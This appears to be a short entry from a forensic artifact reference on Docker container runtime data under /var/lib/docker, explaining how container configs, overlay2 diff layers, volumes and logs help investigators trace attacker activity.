Docker / Container Runtime Artifacts
Location
/var/lib/docker/ (containers/, image/, overlay2/, volumes/) and docker daemon logsDescription
Docker daemon artifacts including container configurations (config.v2.json), image layers and manifests, overlay2 filesystem diffs showing container modifications, volume mounts, network settings, and container execution logs.
Forensic Value
Container forensics is increasingly critical as attackers exploit containerized environments. Container config files reveal the image used, environment variables (potentially containing credentials), volume mounts to host directories, and privileged/capability settings. The overlay2 diff layers show files modified during container runtime, isolating attacker activity from the base image. Container logs capture application output including exploitation attempts and C2 communication. Host-mounted volumes may expose sensitive data accessible from the container.